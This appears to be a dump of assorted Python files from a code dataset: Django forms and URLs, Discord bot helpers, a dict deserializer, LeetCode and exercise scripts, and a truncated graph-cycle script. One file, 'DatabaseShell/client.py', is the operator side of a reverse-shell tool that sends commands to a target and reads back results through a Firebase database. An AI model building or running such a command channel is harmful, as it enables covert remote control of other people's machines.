from address\",\n initial=True,\n required=False\n )\n\n message = forms.CharField(widget=forms.Textarea(attrs={'class': 'form-control'}))\n","repo_name":"rebkwok/freedom_of_flight","sub_path":"studioadmin/forms/email_users_forms.py","file_name":"email_users_forms.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18334139827","text":"\"\"\"\nWrappers for Embed objects.\n\n.. currentmodule:: curious.dataclasses.embed\n\"\"\"\n\nimport datetime\n\nfrom curious.util import attrdict\n\n\nclass Attachment(attrdict):\n def __init__(self, **kwargs):\n self.id = int(kwargs.get(\"id\", 0))\n attrdict.__init__(self, **kwargs)\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __hash__(self):\n return hash(self.id)\n\n\nclass Embed(object): # not an IDObject! Embeds don't have IDs.\n \"\"\"\n Represents an Embed object on Discord.\n \"\"\"\n\n def __init__(self, *,\n title: str = None,\n description: str = None,\n colour: int = None,\n type_: str = None,\n url: str = None,\n timestamp: str = None,\n **kwargs):\n\n #: The title of this embed.\n self.title = title\n\n #: The description of this embed.\n self.description = description\n\n if colour is None:\n # for passing in from discord\n colour = kwargs.get(\"color\")\n\n #: The colour of this embed.\n self.colour = colour\n\n #: The type of this embed.\n self.type_ = type_\n\n #: The URL for this embed.\n self.url = url\n\n #: The timestamp for this embed.\n self.timestamp = timestamp # type: datetime.datetime\n\n #: The fields for this embed.\n self._fields = []\n\n #: The footer for this embed.\n self.footer = attrdict(**kwargs.get(\"footer\", {}))\n\n #: The author of this embed.\n self.author = attrdict(**kwargs.get(\"author\", {}))\n\n #: The image for this embed.\n self.image = attrdict(**kwargs.get(\"image\", {}))\n\n #: The video for this embed.\n self.video = attrdict(**kwargs.get(\"video\", {}))\n\n #: The thumbnail for this embed.\n self.thumbnail = attrdict(**kwargs.get(\"thumbnail\", {}))\n\n def add_field(self, *, name: str, value: str,\n inline: bool = True) -> 'Embed':\n \"\"\"\n Adds a field to the embed.\n\n :param name: The field name.\n :param value: The field value.\n :param inline: Is this field inline?\n :return: The Embed object.\n \"\"\"\n if isinstance(name, str) and len(name) == 0:\n raise ValueError(\"Name must not be empty\")\n\n if isinstance(value, str) and len(value) == 0:\n raise ValueError(\"Value must not be empty\")\n\n self._fields.append(attrdict({\"name\": name, \"value\": value, \"inline\": inline}))\n return self\n\n def set_author(self, *, name: str = None, url: str = None) -> 'Embed':\n \"\"\"\n Sets the author of this embed.\n\n :param name: The name of the author.\n :param url: The URL of the author.\n :return: The Embed object.\n \"\"\"\n\n self.author = attrdict()\n if name:\n self.author.name = name\n\n if url:\n self.author.url = url\n\n return self\n\n def set_footer(self, *, text: str = None, icon_url: str = None) -> 'Embed':\n \"\"\"\n Sets the footer of this embed.\n\n :param text: The footer text of this embed.\n :param icon_url: The icon URL for the footer.\n :return: The Embed object.\n \"\"\"\n self.footer = attrdict()\n if text:\n self.footer.text = text\n\n if icon_url:\n self.footer.icon_url = icon_url\n\n return self\n\n def set_image(self, *, image_url: str) -> 'Embed':\n \"\"\"\n Sets the image of this embed.\n\n :param image_url: The image URL of this embed.\n 
:return: The Embed object.\n \"\"\"\n self.image = attrdict()\n\n if not (image_url.startswith(\"http\") or image_url.startswith(\"attachment://\")):\n raise ValueError(\"Image URLs must start with http[s]\")\n\n if image_url:\n self.image.image_url = image_url\n\n return self\n\n def set_thumbnail(self, *, url: str) -> 'Embed':\n \"\"\"\n Sets the thumbnail image of this embed.\n \n :param url: The image URL of this thumbnail. \n :return: The Embed object.\n \"\"\"\n self.thumbnail = attrdict()\n self.thumbnail.url = url\n\n return self\n\n def to_dict(self):\n \"\"\"\n Converts this embed into a flattened dict.\n \"\"\"\n payload = {\n \"type\": self.type_ if self.type_ else \"rich\"\n }\n\n if self.title:\n payload[\"title\"] = self.title\n\n if self.description:\n payload[\"description\"] = self.description\n\n if self.url:\n payload[\"url\"] = self.url\n\n if self.colour:\n payload[\"color\"] = self.colour # american spelling\n\n if self.timestamp:\n payload[\"timestamp\"] = self.timestamp.strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n\n # attrdicts can be automatically json dumped easily\n # so we just go and shove these right in there\n if self.footer:\n payload[\"footer\"] = self.footer\n\n if self.thumbnail:\n payload[\"thumbnail\"] = self.thumbnail\n\n if self.image:\n payload[\"image\"] = self.image\n\n if self.author:\n payload[\"author\"] = self.author\n\n payload[\"fields\"] = self._fields\n\n return payload\n","repo_name":"Tommy2016x/Discord-App","sub_path":"discord/venv1/Lib/site-packages/curious/dataclasses/embed.py","file_name":"embed.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10160130815","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom authentication.views import UserCreateView, TokenObtainPairView\nfrom authentication.views import create_post, get_user_data, like_post, unlike_post\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include('authentication.urls')),\n path('signup/', UserCreateView.as_view(), name='signup'),\n path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('posts/create/', create_post, name='create_post'),\n path('posts//like/', like_post, name='like_post'),\n path('posts//unlike/', unlike_post, name='unlike_post'),\n path('user/', get_user_data, name='get_user_data'),\n]\n","repo_name":"amnashafiqq/Social_Network_app","sub_path":"social_network_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3086504126","text":"def start(context, log, args):\n from fabric.api import settings\n\n node_name = args['node_name']\n process = args['process']\n signal = args.get('signal', 9)\n\n server = context.get_node_by_id(node_name)\n with settings(warn_only=True):\n res = server.exe('sudo pkill --signal {0} {1}'.format(signal, process))\n\n log.info('Killing process={0} on server={1}. 
result={2}'.format(process, node_name, res.return_code))\n","repo_name":"CiscoSystems/os-sqe","sub_path":"lab/disruptors/pkill.py","file_name":"pkill.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10375629471","text":"from akce import *\nfrom pojistenci import *\nimport os\n\nprint(\"\"\"\n-----------------------------------\nREGISTER OF INSURED PERSONS\n-----------------------------------\n\"\"\")\n\nvyber_akce = True\nwhile vyber_akce:\n print(akce)\n vyberte_operaci = kontrola(\"Enter the action number: \", \"Please enter a number from 1 to 6. \")\n os.system('cls')\n if vyberte_operaci == 1:\n pokracuj = True\n while pokracuj:\n evidence_pojistenych()\n pokracuj = False\n\n elif vyberte_operaci == 2:\n if overeni_prazdneho_pole():\n for seznam in seznam_pojistenych:\n print(seznam.__str__())\n\n elif vyberte_operaci == 3:\n if overeni_prazdneho_pole():\n hledani_pojistenych()\n\n elif vyberte_operaci == 4:\n if overeni_prazdneho_pole():\n editace_pojistenych()\n\n elif vyberte_operaci == 5:\n if overeni_prazdneho_pole():\n smazani_pojistenych()\n\n elif vyberte_operaci == 6:\n vyber_akce = False\n input(\"The program has ended. Press any key...\")\n\n else:\n print(\"Please enter a number from 1 to 6. \")\n \n \n\n","repo_name":"mtruhlar/evidence_pojisteni","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42179050182","text":"#!/usr/bin/python3\n\n\ndef safe_print_list_integers(my_list=[], x=0):\n\n index = 0\n for i in range(x):\n try:\n index += 1\n print(\"{:d}\".format(my_list[i]), end=\"\")\n except (TypeError, ValueError):\n index -= 1\n print(\"\")\n try:\n return (index)\n except NameError:\n return (0)\n","repo_name":"shady-cj/alx-higher_level_programming","sub_path":"0x05-python-exceptions/2-safe_print_list_integers.py","file_name":"2-safe_print_list_integers.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3937542184","text":"def fun1(n):\n return n ** 2\n\nfun2 = lambda n: n ** 2\n\n\nnum = 10\nprint(fun1(num))\nprint(fun2(num))\n\n\nlst = [1, 2, 3, 4, 5, 6, 7]\nout = map(lambda x: x**2+10, lst)\nprint(list(out))\n\nfil = filter(lambda x: x % 2, lst)\nprint(list(fil))","repo_name":"pymft/mft-01","sub_path":"S07/lambda_function/lambda_function_intro.py","file_name":"lambda_function_intro.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13059057739","text":"import os\nimport logging\nimport hikari\nimport lightbulb\n\nfrom peach_bot import peach_bot\n\ndef create_bot() -> lightbulb.BotApp:\n bot = lightbulb.BotApp(\n token=os.environ[\"TOKEN\"],\n prefix=\"!\",\n intents=hikari.Intents.ALL,\n default_enabled_guilds=int(os.environ[\"TEST_GUILD_ID\"]),\n help_slash_command=True,\n logs=\"INFO\"\n ) \n\n bot.load_extensions_from(\"./peach_bot/commands\")\n\n return bot\n\nif __name__ == \"__main__\":\n if os.name != \"nt\":\n import uvloop\n uvloop.install()\n \n create_bot().run()","repo_name":"anthony-nagtalon/hikari_peach_bot","sub_path":"peach_bot/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"36150445518","text":"\"\"\" Logic for the ant objects \"\"\"\n\nimport random\nimport math\nimport utilities as ut\n\n\nclass Ant:\n def __init__(self, config, sim_args, nest_position):\n self.position = nest_position\n self.size = config['graphics']['ant']['radius']\n self.speed = config['ant']['stepsize']\n\n self.initial_energy = config['ant']['ini_energy']\n self.energy = config['ant']['ini_energy']\n\n self.is_carrying_food = False\n\n # Calculate a random distance between 0 and stepsize\n distance = random.uniform(0, self.speed)\n\n # Calculate the angle (in radians) for the new position\n angle = random.uniform(0, 2 * math.pi)\n\n # Calculate the new x and y positions\n self.position['x'] = nest_position['x'] + distance * math.cos(angle)\n self.position['y'] = nest_position['y'] + distance * math.sin(angle)\n\n # Movement\n self.direction = random.uniform(0, 2 * math.pi)\n\n def update(self, colony):\n if self.is_dead():\n return False\n\n # Decision making\n if not self.is_carrying_food and colony.is_food_near(self.position, self.size):\n self.is_carrying_food = True\n self.direction = math.atan2(colony.nest_position['y'] - self.position['y'],\n colony.nest_position['x'] - self.position['x'])\n elif self.is_carrying_food and ut.CalculateDistance(self.position, colony.nest_position) <= self.size:\n self.is_carrying_food = False\n self.direction = random.uniform(0, 2 * math.pi)\n\n if not self.is_carrying_food:\n pheromone = colony.get_closest_pheromone(self.position)\n if pheromone:\n self.direction = math.atan2(pheromone['y'] - self.position['y'],\n pheromone['x'] - self.position['x'])\n\n # Movement\n self.move()\n\n # Decrease energy\n self.energy -= 1\n\n # Lay pheromone\n # if self.is_carrying_food:\n # colony.add_pheromone(self.position)\n\n def is_dead(self):\n return self.energy <= 0\n\n def move(self):\n dx = self.speed * math.cos(self.direction)\n dy = self.speed * math.sin(self.direction)\n\n self.position['x'] += dx\n self.position['y'] += dy\n","repo_name":"mahoskye/colony-ant-simulator","sub_path":"colony-ant-simulator/ant.py","file_name":"ant.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"20003338632","text":"import collections\nfrom enum import Enum\nimport inspect\n\n__author__ = 'yoav.luft@ajillionmax.com'\n\n\nclass DictDeserializer(object):\n \"\"\"\n DictDeserializer is an object that given a callable that construct an object and a dictionary of mapping rules will\n convert dictionary into the object constructed by the function.\n\n The mapping rules define how the raw dictionary values should be passed to the creating function. 
Each key in the\n mapping rules will be matched to a key in the raw data and the rule's value will be used for mapping according to:\n\n * If rule is integer, the raw data value will be passed as a positional argument in the rule as ordering.\n * If rule is a string, the raw data value will be used as keyword argument with the rule as a key.\n * If rule is a callable it will be invoked with (key, raw[key]) and should return a (keyword, value) tuple that\n will be passed as a keyword argument.\n\n Examples::\n\n # Calls `Thing('something')`\n DictDeserializer(Thing, {'argument': 0}).\n create_from({'argument': 'something'})\n\n # Calls `Thing(key1='something')`\n DictDeserializer(Thing, {'arg': 'key1'}).\n create_from({'arg': 'something'})\n\n another_deserializer = DictDeserializer(AnotherThing, {...})\n thing_deserializer = DictDeserializer(Thing,\n {'arg': lambda k, v: ('another', another_deserializer.create_from(v))})\n # Calls `Thing(another=another_deserializer.create_from({'a': 1, 'b': 2}))`\n thing_deserializer.create_from({'arg': {'a': 1, 'b': 2}})\n\n \"\"\"\n\n class UnmappedBehaviour(Enum):\n \"\"\"\n Defines how the deserializer should handle input dictionary fields without mapping rules.\n IGNORE: just ignore them. Default behaviour.\n TO_KWARGS: Pass them to creating function without any mapping.\n FAIL: Fail and raise DeserializerError\n \"\"\"\n IGNORE = 0\n TO_KWARGS = 1\n FAIL = 2\n\n class DeserializerError(TypeError):\n pass\n\n def __init__(self, creator, mapping_rules=None, **kwargs):\n \"\"\"\n Instantiate new deserializer that will use the creator callable and the mapping rules to create new objects.\n :param creator: A callable that will be used for creating new objects. Usually the class itself.\n :param mapping_rules: A dictionary of raw data keys and rules to how they should be used when calling the\n creator callable\n :param unmapped_behaviour:\n :return:\n \"\"\"\n if not mapping_rules:\n mapping_rules = {}\n if not (inspect.isclass(creator) or inspect.isfunction(creator)):\n raise TypeError(\"creator must be a callable or class\")\n self.target_class = creator\n self.rules = mapping_rules\n self.unmapped_behaviour = kwargs.pop('unmapped_behaviour', DictDeserializer.UnmappedBehaviour.IGNORE)\n\n def _map_value(self, key, raw):\n rule = self.rules[key]\n keyword = value = index = None\n if callable(rule):\n keyword, value = rule(key, raw[key])\n elif isinstance(rule, str):\n keyword, value = rule, raw[key]\n elif isinstance(rule, int):\n index, value = rule, raw[key]\n return index, keyword, value\n\n def _map_arguments(self, raw):\n arguments = []\n keywords = {}\n raw_keys_set = set(raw.keys())\n rules_keys_set = set(self.rules.keys())\n unmapped = self._handle_unmapped_values(rules_keys_set, raw_keys_set, raw)\n for key in raw_keys_set.intersection(rules_keys_set):\n index, keyword, value = self._map_value(key, raw)\n if index is not None:\n arguments.insert(index, value)\n else:\n keywords[keyword] = value\n keywords.update(unmapped)\n return arguments, keywords\n\n def _handle_unmapped_values(self, rules_set, raw_set, raw_data):\n if self.unmapped_behaviour == DictDeserializer.UnmappedBehaviour.IGNORE:\n return {}\n unmapped_keys = raw_set - rules_set\n if self.unmapped_behaviour == DictDeserializer.UnmappedBehaviour.FAIL and len(unmapped_keys) > 0:\n raise DictDeserializer.DeserializerError(\"The following keys do no have mapping rules: %s\"\n % str(unmapped_keys))\n return {k: raw_data[k] for k in unmapped_keys}\n\n def create_from(self, raw: dict) -> 
'object':\n if not isinstance(raw, dict):\n raise DictDeserializer.DeserializerError(\"Deserialized object must be a dictionary object\")\n arguments, keywords = self._map_arguments(raw)\n try:\n return self.target_class(*arguments, **keywords)\n except (AttributeError, TypeError) as e:\n raise DictDeserializer.DeserializerError(\"Failed to create object\") from e\n\n\nclass IterableDictDeserializer(DictDeserializer):\n \"\"\"\n The same as :class:`DictDeserializer` only that it accepts an iterable and return an iterable of deserialized objects\n \"\"\"\n def __init__(self, creator, mapping_rules=None, **kwargs):\n super(IterableDictDeserializer, self).__init__(creator, mapping_rules, **kwargs)\n\n def create_from(self, raw: collections.Iterable) -> collections.Iterable:\n return map(super(IterableDictDeserializer, self).create_from, raw)\n\n","repo_name":"ajillion-by-crossrider/ajillion-rpc-client","sub_path":"rpcclient/deserialize.py","file_name":"deserialize.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7834074530","text":"# 234. Palindrome Linked List Add to List\n# DescriptionSubmissionsSolutions\n# Total Accepted: 91931\n# Total Submissions: 287815\n# Difficulty: Easy\n# Contributors: Admin\n# Given a singly linked list, determine if it is a palindrome.\n# \n# Follow up:\n# Could you do it in O(n) time and O(1) space?\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\n# 2018.03.10\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n res = []\n cur = head\n while cur:\n res.append(cur.val)\n cur = cur.next\n \n i, j = 0, len(res) - 1\n while i < j and res[i] == res[j]:\n i, j = i + 1, j - 1\n return False if i < j else True\n\n\n# 2017.03.25 Better way\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if not head or not head.next: return True\n rev = None\n slow = fast = head\n while fast and fast.next:\n fast = fast.next.next\n rev, rev.next, slow = slow, rev, slow.next\n if fast:\n slow = slow.next\n while rev and rev.val == slow.val:\n rev, slow = rev.next, slow.next\n return not rev\n\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if not head or not head.next: return True\n \n slow, fast = head, head.next\n while fast and fast.next:\n slow, fast = slow.next, fast.next.next\n \n l2 = self.reverseList(slow.next)\n\n cur1, cur2 = head, l2\n while cur2:\n if cur1.val != cur2.val:\n return False\n \n cur1, cur2 = cur1.next, cur2.next\n return True\n \n def reverseList(self, head):\n if not head or not head.next: return head\n \n dummy = ListNode(-1)\n dummy.next = head\n pre = dummy\n cur = pre.next\n post = cur.next\n \n while post:\n cur.next = post.next\n post.next = pre.next\n pre.next = post\n post = cur.next\n \n return dummy.next\n","repo_name":"yihanc/LC","sub_path":"PY/234_palindrome_linked_list.py","file_name":"234_palindrome_linked_list.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25701554708","text":"import os\nfrom pprint import pprint\nimport requests\n\n\nclass DataManager:\n def __init__(self):\n self.url = os.environ['SHEETY_ENDPOINT']\n self.header = {\n \"Authorization\": 
f\"Bearer {os.environ['TOKEN']}\"\n }\n\n def get_data(self):\n return requests.get(url=self.url, headers=self.header).json()[\"prices\"]\n\n def update_sheet(self, sheet_data):\n for line in sheet_data:\n request_body = {\n \"price\": {\n \"iataCode\": line[\"iataCode\"]\n }\n }\n response = requests.put(url=f\"{self.url}/{line['id']}\", headers=self.header, json=request_body).text\n pprint(response)\n\n","repo_name":"ZergDefense/Day39-Flight_deal_finder","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24360062631","text":"inp1,inp2=input().split()\ntempp=0\nif len(inp1)>len(inp2):\n inp1,inp2=inp2,inp1\ni=0\nwhile icurr_winner[1]:\r\n curr_winner = winner[:]\r\n else:\r\n curr_winner = winner[:]\r\n return curr_winner[0]","repo_name":"aivandes/algoexpert_solutions","sub_path":"Tournament_winner.py","file_name":"Tournament_winner.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70909094829","text":"import logging\nimport numpy as np\nimport os\nimport sys\n\nfrom gtts import gTTS\nfrom playsound import playsound\n\nfrom cluefinder.ClueFinder import ClueFinder\nfrom cluefinder.ApproximationClueFinder import ApproximationClueFinder\nfrom gamecomponents.ComponentReader import ComponentReader\nfrom gamecomponents.Card import Card, Team\nfrom globalvariables import GRID_SIZE\nfrom iomanager.CodenamesGUI import CodenamesGUI\n\n\"\"\"\nTODO:\n - Have cardGrid be its own class to iterate over cards and maintain game state (team)\n \n - Impose a hierarchy of avoidance to negative words (assassin < other team < neutral)\n - Implement \"related words\" strategy\n - Pre-compute distances between words\n - Pre-compute nearest neighbors?\n\"\"\"\n\nGrid = np.array\nImage = np.array\n\n\ndef printUsage(arg: str):\n print(\"Invalid option: \" + arg + \" \\n\" +\n \"Usage: python run.py [options] \\n\" +\n \"Options: \\n\" +\n \" -noPi Don't run Raspberry Pi code for capturing images and dictating clues \\n\" +\n \" -keycard Location of an existing image of the key card \\n\" +\n \" -wordgrid Location of an existing image of the grid of words \\n\" +\n \" -loadInitialState Location of the object from saveInitialState (bypass all image processing)\\n\" +\n \" -saveInitialState Location to save the game's initial state object \")\n quit(-1)\n\n\ndef stringifyCardgrid(cellString) -> str:\n output: str = \"\"\n for row in range(GRID_SIZE):\n for col in range(GRID_SIZE):\n output += \"[{:^20}]\".format(cellString(row, col))\n output += \"\\n\"\n return output\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename=\"codenames.log\", filemode=\"w\", format=\"%(message)s\", level=logging.INFO)\n\n # COMMAND LINE ARGUMENTS\n usePi: bool = True\n keycard: str = \"\"\n wordgrid: str = \"\"\n loadInitialState: str = \"\"\n saveInitialState: str = \"\"\n\n i: int = 0\n while i + 1 < len(sys.argv):\n i = i + 1\n arg = sys.argv[i]\n if arg == \"-noPi\":\n usePi = False\n elif arg == \"-keycard\" and i + 1 < len(sys.argv):\n i = i + 1\n keycard = sys.argv[i]\n elif arg == \"-wordgrid\" and i + 1 < len(sys.argv):\n i = i + 1\n wordgrid = sys.argv[i]\n elif arg == \"-loadInitialState\" and i + 1 < len(sys.argv):\n i = i + 1\n loadInitialState = sys.argv[i]\n elif arg == \"-saveInitialState\" and i + 1 < len(sys.argv):\n i = i + 1\n saveInitialState = 
sys.argv[i]\n else:\n printUsage(arg)\n\n # SETUP\n gui: CodenamesGUI = CodenamesGUI()\n reader: ComponentReader = ComponentReader()\n clueFinder: ClueFinder = ApproximationClueFinder(vocabularySize=32768)\n cardGrid: Grid = Grid([[Card() for col in range(GRID_SIZE)] for row in range(GRID_SIZE)], dtype=Card)\n\n if loadInitialState != \"\":\n cardGrid = np.load(loadInitialState, allow_pickle=True)\n else:\n if usePi and keycard == \"\":\n keycard = gui.captureKeycard()\n reader.readKeycard(keycard, cardGrid)\n if usePi and wordgrid == \"\":\n wordgrid = gui.captureWordgrid()\n reader.readWordgrid(wordgrid, cardGrid)\n\n team: Team = gui.verifyKeycard(cardGrid)\n logging.info(\"=========================\\n======== KEYCARD ========\\n=========================\")\n logging.info(stringifyCardgrid(lambda row, col: str(cardGrid[row, col].team)))\n\n # MAIN GAME LOOP\n roundNumber: int = 0\n gameOver: bool = False\n while not gameOver:\n roundNumber = roundNumber + 1\n logging.info(\n \"=========================\\n======== ROUND \" + str(roundNumber) + \" ========\\n=========================\")\n\n risk: int = gui.verifyWordgrid(cardGrid)\n while not clueFinder.checkVocabulary(cardGrid):\n risk = gui.verifyWordgrid(cardGrid)\n\n logging.info(stringifyCardgrid(lambda row, col: str(cardGrid[row, col].text)))\n if saveInitialState != \"\":\n np.save(saveInitialState, cardGrid, allow_pickle=True)\n saveInitialState = \"\"\n\n clue: str = clueFinder.getClue(cardGrid, team, risk)\n\n clueAudio: gTTS = gTTS(text=clue, lang=\"en\")\n clueAudio.save(\"clue.mp3\")\n if usePi:\n os.system(\"mpg321 clue.mp3\")\n else:\n playsound(\"clue.mp3\")\n gameOver = gui.displayClueAndWait(clue)\n","repo_name":"kyledpierson/codenames-spymaster","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30334896789","text":"import subprocess\r\nimport time\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import firestore\r\n\r\n\r\nclass Attacker:\r\n def __init__(self):\r\n self.cred = credentials.Certificate(\"serviceAccountKey.json\")\r\n firebase_admin.initialize_app(self.cred)\r\n self.db = firestore.client()\r\n\r\n def sendData(self):\r\n cmd = input(\"(Cible):> \")\r\n self.db.collection(\"cible\").document(\r\n \"command\").set({\"request\": f\"{cmd}\"})\r\n\r\n def recvData(self):\r\n cmd = self.db.collection(\"target\").document(\r\n \"result\").get()\r\n result = cmd.to_dict()\r\n return f\"{result['response']}\"\r\n\r\n def main(self):\r\n print(self.recvData())\r\n self.sendData()\r\n time.sleep(5)\r\n self.main()\r\n\r\n\r\nAttacker().main()\r\n# if msg[:2] == 'cd':\r\n# os.chdir(msg[3:])\r\n# self.send_msg(\"[REVERSE SHELL] * Changed Dir *\")\r\n# elif msg[:4] == 'exit':\r\n# self.fire_init()\r\n# else:\r\n# self.send_msg(result)\r\n","repo_name":"sam31403/clientserver","sub_path":"ClientServer/DatabaseShell/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22150994119","text":"import json\r\nimport discord\r\nimport os\r\nimport platform\r\nimport sys\r\nimport sysconfig\r\nimport psutil\r\nimport cpuinfo\r\n\r\n# https://stackoverflow.com/questions/276052/how-to-get-current-cpu-and-ram-usage-in-python\r\n\r\nfrom discord.ext import commands\r\n\r\nclass System(commands.Cog):\r\n\tdef 
__init__(self, bot, settings):\r\n\t\tself.bot = bot\r\n\t\tself.settings = settings\r\n\r\n\t@commands.command()\r\n\tasync def systeminfo(self, ctx):\r\n\t\t\"\"\"Displays the system's hardware information\"\"\"\r\n\r\n\t\tres = f\"[OS Type][{sys.platform}]\"\r\n\t\tinfo = cpuinfo.get_cpu_info()\r\n\t\tres += f\"\\n[CPU][{psutil.cpu_count(logical=False)} Cores / {psutil.cpu_count()} Threads]\"\r\n\t\tres += f\"\\n[CPU Usage][%{str(psutil.cpu_percent())}]\"\r\n\t\tvmem = psutil.virtual_memory()\r\n\t\tres += f\"\\n[Memory][Total Memory: {int(vmem[0]/2**30)}GB Used: {int(vmem[0]/2**30)-int(vmem[1]/2**30)}GB(%{vmem[2]}) Available: {int(vmem[1]/2**30)}GB]\"\r\n\t\tif str(sys.platform) == 'linux': # Swap memory is only reported on Linux\r\n\t\t\tsmem = psutil.swap_memory()\r\n\t\t\tres += f\"\\n[Swap Memory][Total Swap Memory: {int(smem[0]/2**30)}GB Used: {int(smem[1]/2**30)}GB(%{smem[3]}) Available: {int(smem[2]/2**30)}GB]\"\r\n\t\t\r\n\t\tres += f\"\\n[Python Version][{sysconfig.get_python_version()}]\"\r\n\r\n\t\tINFO = f\"**{self.bot.user.name}**'s System Hardware:\\n```md\\n{res}\\n```\"\r\n\t\t\r\n\t\tif ctx.author.top_role.colour:\r\n\t\t\tcol = ctx.author.top_role.colour\r\n\t\telse:\r\n\t\t\tcol = self.settings.randomColor()\r\n\r\n\t\tembed = discord.Embed(\r\n\t\t\tdescription = INFO,\r\n\t\t\tcolour = col\r\n\t\t)\r\n\t\tawait ctx.send(embed=embed)\r\n\t\t\r\ndef setup(bot):\r\n\tsettings = bot.get_cog(\"Settings\")\r\n\tbot.add_cog(System(bot, settings))","repo_name":"ScoobyChan/ScrappyBot","sub_path":"Cogs/System.py","file_name":"System.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25127723971","text":"#! /usr/bin/env python3\n\n\"\"\"\nBuilds a list of cycles one edge at a time then reports the size of cycles\n\nWhen adding an edge, a dictionary lookup gives a representative vertex for the path containing each end\n1. If both endpoints are included in existing paths, combine the two into one path\n2. If only one endpoint is in an existing path, add it to that path\n3. 
If neither endpoint is included in an existing path, add the edge as a new path\n\nSince the graph is 2-regular, there are an equal number of edges and vertices\nThe step for each edge takes O(1) time (assuming an idealized dictionary lookup) so the total time is O(n)\nThis can be sped up by short circuiting on the first completed cycle - this is still O(n) but probabilistically faster\nThis technique is sufficiently fast, but uses O(n) memory which is insufficient for large graphs\n\"\"\"\n\nfrom collections import deque\nfrom sys import stdin, stderr\n\nDEFAULT_NPAIRS = 100000\nDEFAULT_O = 3\n\ndef read_input(f=stdin):\n    for line in f:\n        line = line.strip()\n        if not line: continue\n        split = line.split()\n        assert len(split) == 2\n        yield split[0], split[-1]\n\ndef path_len(path, O):\n    if O >= 2:\n        return path[0]\n    else:\n        return len(path)\n\ndef append(path, i, j, O):\n    \"\"\"Connect edge {i,j} to a path which has i as an endpoint\"\"\"\n    if O >= 2:\n        path[0] += 1\n        path[1] ^= {i, j} # Replace i with j\n        assert len(path[1]) == 2 # Ensure the set didn't change\n    else:\n        if path[0] == i:\n            path.appendleft(j)\n        elif path[-1] == i:\n            path.append(j)\n        else:\n            assert False, \"%s is not an endpoint of path %s\" % (i, path)\n\ndef connect(endpoint_reprs, paths, repr_i, repr_j, i, j, O):\n    path_i = paths[repr_i]\n    path_j = paths[repr_j]\n\n    if len(path_i) < len(path_j):\n        return connect(endpoint_reprs, paths, repr_j, repr_i, j, i, O) # Make sure we leave the longer list in place\n\n    del endpoint_reprs[i]\n    del endpoint_reprs[j]\n    del paths[repr_j]\n\n    if O >= 2:\n        path_i[0] += path_j[0]\n        path_i[1] -= {i}\n        path_i[1] |= path_j[1] - {j}\n        endpoint_reprs[next(iter(path_j[1] - {j}))] = repr_i\n        assert len(path_i[1]) == 2\n    else:\n        if path_i[0] == i and path_j[0] == j:\n            path_i.extendleft(path_j)\n            endpoint_reprs[path_j[-1]] = repr_i\n        elif path_i[0] == i and path_j[-1] == j:\n            path_i.extendleft(reversed(path_j))\n            endpoint_reprs[path_j[0]] = repr_i\n        elif path_i[-1] == i and path_j[0] == j:\n            path_i.extend(path_j)\n            endpoint_reprs[path_j[-1]] = repr_i\n        elif path_i[-1] == i and path_j[-1] == j:\n            path_i.extend(reversed(path_j))\n            endpoint_reprs[path_j[0]] = repr_i\n        else:\n            assert False, \"%s and %s are not both endpoints of path %s\" % (i, j, path_i)\n\ndef new_path(i, j, O):\n    if O >= 2:\n        return [2, 